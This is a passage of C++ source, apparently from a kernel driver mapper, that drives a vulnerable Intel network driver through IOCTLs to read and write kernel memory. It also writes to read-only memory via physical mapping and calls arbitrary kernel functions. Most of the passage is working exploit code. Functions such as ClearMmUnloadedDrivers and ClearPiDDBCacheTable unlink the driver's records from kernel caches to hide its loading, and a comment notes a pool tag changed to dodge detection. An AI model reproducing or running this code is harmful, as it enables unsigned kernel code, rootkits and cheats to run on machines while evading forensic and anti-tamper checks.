fill_memory_buffer.case_number = 0x30; 420 | fill_memory_buffer.destination = address; 421 | fill_memory_buffer.value = value; 422 | fill_memory_buffer.length = size; 423 | 424 | DWORD bytes_returned = 0; 425 | return DeviceIoControl(device_handle, ioctl1, &fill_memory_buffer, sizeof(fill_memory_buffer), nullptr, 0, &bytes_returned, nullptr); 426 | } 427 | 428 | bool intel_driver::GetPhysicalAddress(HANDLE device_handle, uint64_t address, uint64_t* out_physical_address) { 429 | if (!address) 430 | return 0; 431 | 432 | GET_PHYS_ADDRESS_BUFFER_INFO get_phys_address_buffer = { 0 }; 433 | 434 | get_phys_address_buffer.case_number = 0x25; 435 | get_phys_address_buffer.address_to_translate = address; 436 | 437 | DWORD bytes_returned = 0; 438 | 439 | if (!DeviceIoControl(device_handle, ioctl1, &get_phys_address_buffer, sizeof(get_phys_address_buffer), nullptr, 0, &bytes_returned, nullptr)) 440 | return false; 441 | 442 | *out_physical_address = get_phys_address_buffer.return_physical_address; 443 | return true; 444 | } 445 | 446 | uint64_t intel_driver::MapIoSpace(HANDLE device_handle, uint64_t physical_address, uint32_t size) { 447 | if (!physical_address || !size) 448 | return 0; 449 | 450 | MAP_IO_SPACE_BUFFER_INFO map_io_space_buffer = { 0 }; 451 | 452 | map_io_space_buffer.case_number = 0x19; 453 | map_io_space_buffer.physical_address_to_map = physical_address; 454 | map_io_space_buffer.size = size; 455 | 456 | DWORD bytes_returned = 0; 457 | 458 | if (!DeviceIoControl(device_handle, ioctl1, &map_io_space_buffer, sizeof(map_io_space_buffer), nullptr, 0, &bytes_returned, nullptr)) 459 | return 0; 460 | 461 | return map_io_space_buffer.return_virtual_address; 462 | } 463 | 464 | bool intel_driver::UnmapIoSpace(HANDLE device_handle, uint64_t address, uint32_t size) { 465 | if (!address || !size) 466 | return false; 467 | 468 | UNMAP_IO_SPACE_BUFFER_INFO unmap_io_space_buffer = { 0 }; 469 | 470 | unmap_io_space_buffer.case_number = 0x1A; 471 | unmap_io_space_buffer.virt_address = address; 472 | unmap_io_space_buffer.number_of_bytes = size; 473 | 474 | DWORD bytes_returned = 0; 475 | 476 | return DeviceIoControl(device_handle, ioctl1, &unmap_io_space_buffer, sizeof(unmap_io_space_buffer), nullptr, 0, &bytes_returned, nullptr); 477 | } 478 | 479 | bool intel_driver::ReadMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) { 480 | return MemCopy(device_handle, reinterpret_cast(buffer), address, size); 481 | } 482 | 483 | bool intel_driver::WriteMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) { 484 | return MemCopy(device_handle, address, reinterpret_cast(buffer), size); 485 | } 486 | 487 | bool intel_driver::WriteToReadOnlyMemory(HANDLE device_handle, uint64_t address, void* buffer, uint32_t size) { 488 | if (!address || !buffer || !size) 489 | return false; 490 | 491 | uint64_t physical_address = 0; 492 | 493 | if (!GetPhysicalAddress(device_handle, address, &physical_address)) { 494 | Log(L"[-] Failed to translate virtual address 0x" << reinterpret_cast(address) << std::endl); 495 | return false; 496 | } 497 | 498 | const uint64_t mapped_physical_memory = MapIoSpace(device_handle, physical_address, size); 499 | 500 | if (!mapped_physical_memory) { 501 | Log(L"[-] Failed to map IO space of 0x" << reinterpret_cast(physical_address) << std::endl); 502 | return false; 503 | } 504 | 505 | bool result = WriteMemory(device_handle, mapped_physical_memory, buffer, size); 506 | 507 | #if defined(DISABLE_OUTPUT) 508 | UnmapIoSpace(device_handle, mapped_physical_memory, size); 509 | #else 510 | if (!UnmapIoSpace(device_handle, mapped_physical_memory, size)) 511 | Log(L"[!] Failed to unmap IO space of physical address 0x" << reinterpret_cast(physical_address) << std::endl); 512 | #endif 513 | 514 | 515 | return result; 516 | } 517 | 518 | uint64_t intel_driver::MmAllocateIndependentPagesEx(HANDLE device_handle, uint32_t size) 519 | { 520 | uint64_t allocated_pages{}; 521 | 522 | static uint64_t kernel_MmAllocateIndependentPagesEx = 0; 523 | 524 | #ifdef PDB_OFFSETS 525 | if (!kernel_MmAllocateIndependentPagesEx) 526 | { 527 | kernel_MmAllocateIndependentPagesEx = KDSymbolsHandler::GetInstance()->GetOffset(L"MmAllocateIndependentPagesEx"); 528 | if (!kernel_MmAllocateIndependentPagesEx) { 529 | Log(L"[!] Failed to find MmAllocateIndependentPagesEx" << std::endl); 530 | return 0; 531 | } 532 | kernel_MmAllocateIndependentPagesEx += intel_driver::ntoskrnlAddr; 533 | } 534 | #else 535 | if (!kernel_MmAllocateIndependentPagesEx) 536 | { 537 | //Updated, tested from 1803 to 24H2 538 | //KeAllocateInterrupt -> 41 8B D6 B9 00 10 00 00 E8 ?? ?? ?? ?? 48 8B D8 539 | kernel_MmAllocateIndependentPagesEx = intel_driver::FindPatternInSectionAtKernel(device_handle, (char*)".text", intel_driver::ntoskrnlAddr, 540 | (BYTE*)"\x41\x8B\xD6\xB9\x00\x10\x00\x00\xE8\x00\x00\x00\x00\x48\x8B\xD8", 541 | (char*)"xxxxxxxxx????xxx"); 542 | if (!kernel_MmAllocateIndependentPagesEx) { 543 | Log(L"[!] Failed to find MmAllocateIndependentPagesEx" << std::endl); 544 | return 0; 545 | } 546 | 547 | kernel_MmAllocateIndependentPagesEx += 8; 548 | 549 | kernel_MmAllocateIndependentPagesEx = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmAllocateIndependentPagesEx, 1, 5); 550 | if (!kernel_MmAllocateIndependentPagesEx) { 551 | Log(L"[!] Failed to find MmAllocateIndependentPagesEx" << std::endl); 552 | return 0; 553 | } 554 | } 555 | #endif 556 | 557 | if (!intel_driver::CallKernelFunction(device_handle, &allocated_pages, kernel_MmAllocateIndependentPagesEx, size, -1, 0, 0)) 558 | return 0; 559 | 560 | return allocated_pages; 561 | } 562 | 563 | bool intel_driver::MmFreeIndependentPages(HANDLE device_handle, uint64_t address, uint32_t size) 564 | { 565 | static uint64_t kernel_MmFreeIndependentPages = 0; 566 | 567 | if (!kernel_MmFreeIndependentPages) 568 | { 569 | #ifdef PDB_OFFSETS 570 | kernel_MmFreeIndependentPages = KDSymbolsHandler::GetInstance()->GetOffset(L"MmFreeIndependentPages"); 571 | if (!kernel_MmFreeIndependentPages) { 572 | Log(L"[!] Failed to find MmFreeIndependentPages" << std::endl); 573 | return false; 574 | } 575 | kernel_MmFreeIndependentPages += intel_driver::ntoskrnlAddr; 576 | #else 577 | kernel_MmFreeIndependentPages = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, 578 | (BYTE*)"\xBA\x00\x60\x00\x00\x48\x8B\xCB\xE8\x00\x00\x00\x00\x48\x8D\x8B\x00\xF0\xFF\xFF", 579 | (char*)"xxxxxxxxx????xxxxxxx"); 580 | if (!kernel_MmFreeIndependentPages) { 581 | Log(L"[!] Failed to find MmFreeIndependentPages" << std::endl); 582 | return false; 583 | } 584 | 585 | kernel_MmFreeIndependentPages += 8; 586 | 587 | kernel_MmFreeIndependentPages = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmFreeIndependentPages, 1, 5); 588 | if (!kernel_MmFreeIndependentPages) { 589 | Log(L"[!] Failed to find MmFreeIndependentPages" << std::endl); 590 | return false; 591 | } 592 | #endif 593 | } 594 | 595 | uint64_t result{}; 596 | return intel_driver::CallKernelFunction(device_handle, &result, kernel_MmFreeIndependentPages, address, size); 597 | } 598 | 599 | BOOLEAN intel_driver::MmSetPageProtection(HANDLE device_handle, uint64_t address, uint32_t size, ULONG new_protect) 600 | { 601 | if (!address) 602 | { 603 | Log(L"[!] Invalid address passed to MmSetPageProtection" << std::endl); 604 | return FALSE; 605 | } 606 | 607 | static uint64_t kernel_MmSetPageProtection = 0; 608 | 609 | if (!kernel_MmSetPageProtection) 610 | { 611 | #ifdef PDB_OFFSETS 612 | kernel_MmSetPageProtection = KDSymbolsHandler::GetInstance()->GetOffset(L"MmSetPageProtection"); 613 | if (!kernel_MmSetPageProtection) { 614 | Log(L"[!] Failed to find MmSetPageProtection" << std::endl); 615 | return FALSE; 616 | } 617 | kernel_MmSetPageProtection += intel_driver::ntoskrnlAddr; 618 | #else 619 | //Updated, tested from 1803 to 24H2 620 | // 0F 45 ? ? 8D ? ? ? FF FF E8 621 | // 0F 45 ? ? 45 8B ? ? ? ? 8D ? ? ? ? ? ? FF FF E8 (Some windows builds have a instruction in the middle) 622 | kernel_MmSetPageProtection = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGELK", intel_driver::ntoskrnlAddr, 623 | (BYTE*)"\x0F\x45\x00\x00\x8D\x00\x00\x00\xFF\xFF\xE8", 624 | (char*)"xx??x???xxx"); 625 | if (!kernel_MmSetPageProtection) { 626 | 627 | kernel_MmSetPageProtection = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGELK", intel_driver::ntoskrnlAddr, 628 | (BYTE*)"\x0F\x45\x00\x00\x45\x8B\x00\x00\x00\x00\x8D\x00\x00\x00\x00\x00\x00\xFF\xFF\xE8", 629 | (char*)"xx??xx????x???xxx"); 630 | 631 | if (!kernel_MmSetPageProtection) { 632 | Log(L"[!] Failed to find MmSetPageProtection" << std::endl); 633 | return FALSE; 634 | } 635 | 636 | kernel_MmSetPageProtection += 13; 637 | } 638 | else { 639 | kernel_MmSetPageProtection += 10; 640 | } 641 | 642 | kernel_MmSetPageProtection = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmSetPageProtection, 1, 5); 643 | if (!kernel_MmSetPageProtection) { 644 | Log(L"[!] Failed to find MmSetPageProtection" << std::endl); 645 | return FALSE; 646 | } 647 | #endif 648 | } 649 | 650 | BOOLEAN set_prot_status{}; 651 | if (!intel_driver::CallKernelFunction(device_handle, &set_prot_status, kernel_MmSetPageProtection, address, size, new_protect)) 652 | return FALSE; 653 | 654 | return set_prot_status; 655 | } 656 | 657 | uint64_t intel_driver::AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_type, uint64_t size) { 658 | if (!size) 659 | return 0; 660 | 661 | static uint64_t kernel_ExAllocatePool = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExAllocatePoolWithTag"); 662 | 663 | if (!kernel_ExAllocatePool) { 664 | Log(L"[!] Failed to find ExAllocatePool" << std::endl); 665 | return 0; 666 | } 667 | 668 | uint64_t allocated_pool = 0; 669 | 670 | if (!CallKernelFunction(device_handle, &allocated_pool, kernel_ExAllocatePool, pool_type, size, 'BwtE')) //Changed pool tag since an extremely meme checking diff between allocation size and average for detection.... 671 | return 0; 672 | 673 | return allocated_pool; 674 | } 675 | 676 | bool intel_driver::FreePool(HANDLE device_handle, uint64_t address) { 677 | if (!address) 678 | return 0; 679 | 680 | static uint64_t kernel_ExFreePool = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExFreePool"); 681 | 682 | if (!kernel_ExFreePool) { 683 | Log(L"[!] Failed to find ExAllocatePool" << std::endl); 684 | return 0; 685 | } 686 | 687 | return CallKernelFunction(device_handle, nullptr, kernel_ExFreePool, address); 688 | } 689 | 690 | uint64_t intel_driver::GetKernelModuleExport(HANDLE device_handle, uint64_t kernel_module_base, const std::string& function_name) { 691 | if (!kernel_module_base) 692 | return 0; 693 | 694 | IMAGE_DOS_HEADER dos_header = { 0 }; 695 | IMAGE_NT_HEADERS64 nt_headers = { 0 }; 696 | 697 | if (!ReadMemory(device_handle, kernel_module_base, &dos_header, sizeof(dos_header)) || dos_header.e_magic != IMAGE_DOS_SIGNATURE || 698 | !ReadMemory(device_handle, kernel_module_base + dos_header.e_lfanew, &nt_headers, sizeof(nt_headers)) || nt_headers.Signature != IMAGE_NT_SIGNATURE) 699 | return 0; 700 | 701 | const auto export_base = nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 702 | const auto export_base_size = nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; 703 | 704 | if (!export_base || !export_base_size) 705 | return 0; 706 | 707 | const auto export_data = reinterpret_cast(VirtualAlloc(nullptr, export_base_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)); 708 | 709 | if (!ReadMemory(device_handle, kernel_module_base + export_base, export_data, export_base_size)) 710 | { 711 | VirtualFree(export_data, 0, MEM_RELEASE); 712 | return 0; 713 | } 714 | 715 | const auto delta = reinterpret_cast(export_data) - export_base; 716 | 717 | const auto name_table = reinterpret_cast(export_data->AddressOfNames + delta); 718 | const auto ordinal_table = reinterpret_cast(export_data->AddressOfNameOrdinals + delta); 719 | const auto function_table = reinterpret_cast(export_data->AddressOfFunctions + delta); 720 | 721 | for (auto i = 0u; i < export_data->NumberOfNames; ++i) { 722 | const std::string current_function_name = std::string(reinterpret_cast(name_table[i] + delta)); 723 | 724 | if (!_stricmp(current_function_name.c_str(), function_name.c_str())) { 725 | const auto function_ordinal = ordinal_table[i]; 726 | if (function_table[function_ordinal] <= 0x1000) { 727 | // Wrong function address? 728 | return 0; 729 | } 730 | const auto function_address = kernel_module_base + function_table[function_ordinal]; 731 | 732 | if (function_address >= kernel_module_base + export_base && function_address <= kernel_module_base + export_base + export_base_size) { 733 | VirtualFree(export_data, 0, MEM_RELEASE); 734 | return 0; // No forwarded exports on 64bit? 735 | } 736 | 737 | VirtualFree(export_data, 0, MEM_RELEASE); 738 | return function_address; 739 | } 740 | } 741 | 742 | VirtualFree(export_data, 0, MEM_RELEASE); 743 | return 0; 744 | } 745 | 746 | bool intel_driver::ClearMmUnloadedDrivers(HANDLE device_handle) { 747 | ULONG buffer_size = 0; 748 | void* buffer = nullptr; 749 | 750 | NTSTATUS status = NtQuerySystemInformation(static_cast(nt::SystemExtendedHandleInformation), buffer, buffer_size, &buffer_size); 751 | 752 | while (status == nt::STATUS_INFO_LENGTH_MISMATCH) 753 | { 754 | VirtualFree(buffer, 0, MEM_RELEASE); 755 | 756 | buffer = VirtualAlloc(nullptr, buffer_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 757 | status = NtQuerySystemInformation(static_cast(nt::SystemExtendedHandleInformation), buffer, buffer_size, &buffer_size); 758 | } 759 | 760 | if (!NT_SUCCESS(status) || buffer == 0) 761 | { 762 | if (buffer != 0) 763 | VirtualFree(buffer, 0, MEM_RELEASE); 764 | return false; 765 | } 766 | 767 | uint64_t object = 0; 768 | 769 | auto system_handle_inforamtion = static_cast(buffer); 770 | 771 | for (auto i = 0u; i < system_handle_inforamtion->HandleCount; ++i) 772 | { 773 | const nt::SYSTEM_HANDLE current_system_handle = system_handle_inforamtion->Handles[i]; 774 | 775 | if (current_system_handle.UniqueProcessId != reinterpret_cast(static_cast(GetCurrentProcessId()))) 776 | continue; 777 | 778 | if (current_system_handle.HandleValue == device_handle) 779 | { 780 | object = reinterpret_cast(current_system_handle.Object); 781 | break; 782 | } 783 | } 784 | 785 | VirtualFree(buffer, 0, MEM_RELEASE); 786 | 787 | if (!object) 788 | return false; 789 | 790 | uint64_t device_object = 0; 791 | 792 | if (!ReadMemory(device_handle, object + 0x8, &device_object, sizeof(device_object)) || !device_object) { 793 | Log(L"[!] Failed to find device_object" << std::endl); 794 | return false; 795 | } 796 | 797 | uint64_t driver_object = 0; 798 | 799 | if (!ReadMemory(device_handle, device_object + 0x8, &driver_object, sizeof(driver_object)) || !driver_object) { 800 | Log(L"[!] Failed to find driver_object" << std::endl); 801 | return false; 802 | } 803 | 804 | uint64_t driver_section = 0; 805 | 806 | if (!ReadMemory(device_handle, driver_object + 0x28, &driver_section, sizeof(driver_section)) || !driver_section) { 807 | Log(L"[!] Failed to find driver_section" << std::endl); 808 | return false; 809 | } 810 | 811 | UNICODE_STRING us_driver_base_dll_name = { 0 }; 812 | 813 | if (!ReadMemory(device_handle, driver_section + 0x58, &us_driver_base_dll_name, sizeof(us_driver_base_dll_name)) || us_driver_base_dll_name.Length == 0) { 814 | Log(L"[!] Failed to find driver name" << std::endl); 815 | return false; 816 | } 817 | 818 | auto unloadedName = std::make_unique((ULONG64)us_driver_base_dll_name.Length / 2ULL + 1ULL); 819 | if (!ReadMemory(device_handle, (uintptr_t)us_driver_base_dll_name.Buffer, unloadedName.get(), us_driver_base_dll_name.Length)) { 820 | Log(L"[!] Failed to read driver name" << std::endl); 821 | return false; 822 | } 823 | 824 | us_driver_base_dll_name.Length = 0; //MiRememberUnloadedDriver will check if the length > 0 to save the unloaded driver 825 | 826 | if (!WriteMemory(device_handle, driver_section + 0x58, &us_driver_base_dll_name, sizeof(us_driver_base_dll_name))) { 827 | Log(L"[!] Failed to write driver name length" << std::endl); 828 | return false; 829 | } 830 | 831 | Log(L"[+] MmUnloadedDrivers Cleaned: " << unloadedName << std::endl); 832 | return true; 833 | } 834 | 835 | PVOID intel_driver::ResolveRelativeAddress(HANDLE device_handle, _In_ PVOID Instruction, _In_ ULONG OffsetOffset, _In_ ULONG InstructionSize) { 836 | ULONG_PTR Instr = (ULONG_PTR)Instruction; 837 | LONG RipOffset = 0; 838 | if (!ReadMemory(device_handle, Instr + OffsetOffset, &RipOffset, sizeof(LONG))) { 839 | return nullptr; 840 | } 841 | PVOID ResolvedAddr = (PVOID)(Instr + InstructionSize + RipOffset); 842 | return ResolvedAddr; 843 | } 844 | 845 | bool intel_driver::ExAcquireResourceExclusiveLite(HANDLE device_handle, PVOID Resource, BOOLEAN wait) { 846 | if (!Resource) 847 | return 0; 848 | 849 | static uint64_t kernel_ExAcquireResourceExclusiveLite = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExAcquireResourceExclusiveLite"); 850 | 851 | if (!kernel_ExAcquireResourceExclusiveLite) { 852 | Log(L"[!] Failed to find ExAcquireResourceExclusiveLite" << std::endl); 853 | return 0; 854 | } 855 | 856 | BOOLEAN out; 857 | 858 | return (CallKernelFunction(device_handle, &out, kernel_ExAcquireResourceExclusiveLite, Resource, wait) && out); 859 | } 860 | 861 | bool intel_driver::ExReleaseResourceLite(HANDLE device_handle, PVOID Resource) { 862 | if (!Resource) 863 | return false; 864 | 865 | static uint64_t kernel_ExReleaseResourceLite = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExReleaseResourceLite"); 866 | 867 | if (!kernel_ExReleaseResourceLite) { 868 | Log(L"[!] Failed to find ExReleaseResourceLite" << std::endl); 869 | return false; 870 | } 871 | 872 | return CallKernelFunction(device_handle, nullptr, kernel_ExReleaseResourceLite, Resource); 873 | } 874 | 875 | BOOLEAN intel_driver::RtlDeleteElementGenericTableAvl(HANDLE device_handle, PVOID Table, PVOID Buffer) { 876 | if (!Table) 877 | return false; 878 | 879 | static uint64_t kernel_RtlDeleteElementGenericTableAvl = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "RtlDeleteElementGenericTableAvl"); 880 | 881 | if (!kernel_RtlDeleteElementGenericTableAvl) { 882 | Log(L"[!] Failed to find RtlDeleteElementGenericTableAvl" << std::endl); 883 | return false; 884 | } 885 | 886 | bool out; 887 | return (CallKernelFunction(device_handle, &out, kernel_RtlDeleteElementGenericTableAvl, Table, Buffer) && out); 888 | } 889 | 890 | PVOID intel_driver::RtlLookupElementGenericTableAvl(HANDLE device_handle, nt::PRTL_AVL_TABLE Table, PVOID Buffer) { 891 | if (!Table) 892 | return nullptr; 893 | 894 | static uint64_t kernel_RtlDeleteElementGenericTableAvl = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "RtlLookupElementGenericTableAvl"); 895 | 896 | if (!kernel_RtlDeleteElementGenericTableAvl) { 897 | Log(L"[!] Failed to find RtlLookupElementGenericTableAvl" << std::endl); 898 | return nullptr; 899 | } 900 | 901 | PVOID out; 902 | 903 | if (!CallKernelFunction(device_handle, &out, kernel_RtlDeleteElementGenericTableAvl, Table, Buffer)) 904 | return 0; 905 | 906 | return out; 907 | } 908 | 909 | 910 | nt::PiDDBCacheEntry* intel_driver::LookupEntry(HANDLE device_handle, nt::PRTL_AVL_TABLE PiDDBCacheTable, ULONG timestamp, const wchar_t * name) { 911 | 912 | nt::PiDDBCacheEntry localentry{}; 913 | localentry.TimeDateStamp = timestamp; 914 | localentry.DriverName.Buffer = (PWSTR)name; 915 | localentry.DriverName.Length = (USHORT)(wcslen(name) * 2); 916 | localentry.DriverName.MaximumLength = localentry.DriverName.Length + 2; 917 | 918 | return (nt::PiDDBCacheEntry*)RtlLookupElementGenericTableAvl(device_handle, PiDDBCacheTable, (PVOID)&localentry); 919 | } 920 | 921 | bool intel_driver::ClearPiDDBCacheTable(HANDLE device_handle) { //PiDDBCacheTable added on LoadDriver 922 | 923 | #ifdef PDB_OFFSETS 924 | auto PiDDBLockOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"PiDDBLock"); 925 | if (!PiDDBLockOffset) 926 | { 927 | Log(L"[-] Warning PiDDBLock not found" << std::endl); 928 | return false; 929 | } 930 | 931 | auto PiDDBCacheTableOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"PiDDBCacheTable"); 932 | if (!PiDDBLockOffset) 933 | { 934 | Log(L"[-] Warning PiDDBCacheTable not found" << std::endl); 935 | return false; 936 | } 937 | 938 | PVOID PiDDBLock = (PVOID)(intel_driver::ntoskrnlAddr + PiDDBLockOffset); 939 | nt::PRTL_AVL_TABLE PiDDBCacheTable = (nt::PRTL_AVL_TABLE)(intel_driver::ntoskrnlAddr + PiDDBCacheTableOffset); 940 | #else 941 | auto PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x8B\xD8\x85\xC0\x0F\x88\x00\x00\x00\x00\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x66\xFF\x88\x00\x00\x00\x00\xB2\x01\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\x4C\x8B\x00\x24", "xxxxxx????xxxxx????xxx????xxxxx????x????xx?x"); // 8B D8 85 C0 0F 88 ? ? ? ? 65 48 8B 04 25 ? ? ? ? 66 FF 88 ? ? ? ? B2 01 48 8D 0D ? ? ? ? E8 ? ? ? ? 4C 8B ? 24 update for build 22000.132 942 | auto PiDDBCacheTablePtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x66\x03\xD2\x48\x8D\x0D", "xxxxxx"); // 66 03 D2 48 8D 0D 943 | 944 | if (PiDDBLockPtr == NULL) { // PiDDBLock pattern changes a lot from version 1607 of windows and we will need a second pattern if we want to keep simple as possible 945 | PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x48\x8B\x0D\x00\x00\x00\x00\x48\x85\xC9\x0F\x85\x00\x00\x00\x00\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\xE8", "xxx????xxxxx????xxx????x????x"); // 48 8B 0D ? ? ? ? 48 85 C9 0F 85 ? ? ? ? 48 8D 0D ? ? ? ? E8 ? ? ? ? E8 build 22449+ (pattern can be improved but just fine for now) 946 | if (PiDDBLockPtr == NULL) { 947 | PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x8B\xD8\x85\xC0\x0F\x88\x00\x00\x00\x00\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x48\x8D\x0D\x00\x00\x00\x00\xB2\x01\x66\xFF\x88\x00\x00\x00\x00\x90\xE8\x00\x00\x00\x00\x4C\x8B\x00\x24", "xxxxxx????xxxxx????xxx????xxxxx????xx????xx?x"); // 8B D8 85 C0 0F 88 ? ? ? ? 65 48 8B 04 25 ? ? ? ? 48 8D 0D ? ? ? ? B2 01 66 FF 88 ? ? ? ? 90 E8 ? ? ? ? 4C 8B ? 24 update for build 26100.1000 948 | if (PiDDBLockPtr == NULL) { 949 | Log(L"[-] Warning PiDDBLock not found" << std::endl); 950 | return false; 951 | } 952 | else { 953 | Log(L"[+] PiDDBLock found with third pattern" << std::endl); 954 | PiDDBLockPtr += 19;//third pattern offset 955 | } 956 | } 957 | else { 958 | Log(L"[+] PiDDBLock found with second pattern" << std::endl); 959 | PiDDBLockPtr += 16; //second pattern offset 960 | } 961 | } 962 | else { 963 | PiDDBLockPtr += 28; //first pattern offset 964 | } 965 | 966 | if (PiDDBCacheTablePtr == NULL) { 967 | PiDDBCacheTablePtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x48\x8B\xF9\x33\xC0\x48\x8D\x0D", "xxxxxxxx"); // 48 8B F9 33 C0 48 8D 0D 968 | if (PiDDBCacheTablePtr == NULL) { 969 | Log(L"[-] Warning PiDDBCacheTable not found" << std::endl); 970 | return false; 971 | } 972 | else { 973 | Log(L"[+] PiDDBCacheTable found with second pattern" << std::endl); 974 | PiDDBCacheTablePtr += 2;//second pattern offset 975 | } 976 | } 977 | 978 | Log("[+] PiDDBLock Ptr 0x" << std::hex << PiDDBLockPtr << std::endl); 979 | Log("[+] PiDDBCacheTable Ptr 0x" << std::hex << PiDDBCacheTablePtr << std::endl); 980 | 981 | PVOID PiDDBLock = ResolveRelativeAddress(device_handle, (PVOID)PiDDBLockPtr, 3, 7); 982 | nt::PRTL_AVL_TABLE PiDDBCacheTable = (nt::PRTL_AVL_TABLE)ResolveRelativeAddress(device_handle, (PVOID)PiDDBCacheTablePtr, 6, 10); 983 | #endif 984 | //context part is not used by lookup, lock or delete why we should use it? 985 | 986 | if (!ExAcquireResourceExclusiveLite(device_handle, PiDDBLock, true)) { 987 | Log(L"[-] Can't lock PiDDBCacheTable" << std::endl); 988 | return false; 989 | } 990 | Log(L"[+] PiDDBLock Locked" << std::endl); 991 | 992 | auto n = GetDriverNameW(); 993 | 994 | // search our entry in the table 995 | nt::PiDDBCacheEntry* pFoundEntry = (nt::PiDDBCacheEntry*)LookupEntry(device_handle, PiDDBCacheTable, iqvw64e_timestamp, n.c_str()); 996 | if (pFoundEntry == nullptr) { 997 | Log(L"[-] Not found in cache" << std::endl); 998 | ExReleaseResourceLite(device_handle, PiDDBLock); 999 | return false; 1000 | } 1001 | 1002 | // first, unlink from the list 1003 | PLIST_ENTRY prev; 1004 | if (!ReadMemory(device_handle, (uintptr_t)pFoundEntry + (offsetof(struct nt::_PiDDBCacheEntry, List.Blink)), &prev, sizeof(_LIST_ENTRY*))) { 1005 | Log(L"[-] Can't get prev entry" << std::endl); 1006 | ExReleaseResourceLite(device_handle, PiDDBLock); 1007 | return false; 1008 | } 1009 | PLIST_ENTRY next; 1010 | if (!ReadMemory(device_handle, (uintptr_t)pFoundEntry + (offsetof(struct nt::_PiDDBCacheEntry, List.Flink)), &next, sizeof(_LIST_ENTRY*))) { 1011 | Log(L"[-] Can't get next entry" << std::endl); 1012 | ExReleaseResourceLite(device_handle, PiDDBLock); 1013 | return false; 1014 | } 1015 | 1016 | Log("[+] Found Table Entry = 0x" << std::hex << pFoundEntry << std::endl); 1017 | 1018 | if (!WriteMemory(device_handle, (uintptr_t)prev + (offsetof(struct _LIST_ENTRY, Flink)), &next, sizeof(_LIST_ENTRY*))) { 1019 | Log(L"[-] Can't set next entry" << std::endl); 1020 | ExReleaseResourceLite(device_handle, PiDDBLock); 1021 | return false; 1022 | } 1023 | if (!WriteMemory(device_handle, (uintptr_t)next + (offsetof(struct _LIST_ENTRY, Blink)), &prev, sizeof(_LIST_ENTRY*))) { 1024 | Log(L"[-] Can't set prev entry" << std::endl); 1025 | ExReleaseResourceLite(device_handle, PiDDBLock); 1026 | return false; 1027 | } 1028 | 1029 | // then delete the element from the avl table 1030 | if (!RtlDeleteElementGenericTableAvl(device_handle, PiDDBCacheTable, pFoundEntry)) { 1031 | Log(L"[-] Can't delete from PiDDBCacheTable" << std::endl); 1032 | ExReleaseResourceLite(device_handle, PiDDBLock); 1033 | return false; 1034 | } 1035 | 1036 | //Decrement delete count 1037 | ULONG cacheDeleteCount = 0; 1038 | ReadMemory(device_handle, (uintptr_t)PiDDBCacheTable + (offsetof(struct nt::_RTL_AVL_TABLE, DeleteCount)), &cacheDeleteCount, sizeof(ULONG)); 1039 | if (cacheDeleteCount > 0) { 1040 | cacheDeleteCount--; 1041 | WriteMemory(device_handle, (uintptr_t)PiDDBCacheTable + (offsetof(struct nt::_RTL_AVL_TABLE, DeleteCount)), &cacheDeleteCount, sizeof(ULONG)); 1042 | } 1043 | 1044 | // release the ddb resource lock 1045 | ExReleaseResourceLite(device_handle, PiDDBLock); 1046 | 1047 | Log(L"[+] PiDDBCacheTable Cleaned" << std::endl); 1048 | 1049 | return true; 1050 | } 1051 | 1052 | uintptr_t intel_driver::FindPatternAtKernel(HANDLE device_handle, uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask) { 1053 | if (!dwAddress) { 1054 | Log(L"[-] No module address to find pattern" << std::endl); 1055 | return 0; 1056 | } 1057 | 1058 | if (dwLen > 1024 * 1024 * 1024) { //if read is > 1GB 1059 | Log(L"[-] Can't find pattern, Too big section" << std::endl); 1060 | return 0; 1061 | } 1062 | 1063 | auto sectionData = std::make_unique(dwLen); 1064 | if (!ReadMemory(device_handle, dwAddress, sectionData.get(), dwLen)) { 1065 | Log(L"[-] Read failed in FindPatternAtKernel" << std::endl); 1066 | return 0; 1067 | } 1068 | 1069 | auto result = utils::FindPattern((uintptr_t)sectionData.get(), dwLen, bMask, szMask); 1070 | 1071 | if (result <= 0) { 1072 | return 0; 1073 | } 1074 | result = dwAddress - (uintptr_t)sectionData.get() + result; 1075 | return result; 1076 | } 1077 | 1078 | uintptr_t intel_driver::FindSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, PULONG size) { 1079 | if (!modulePtr) 1080 | return 0; 1081 | BYTE headers[0x1000]; 1082 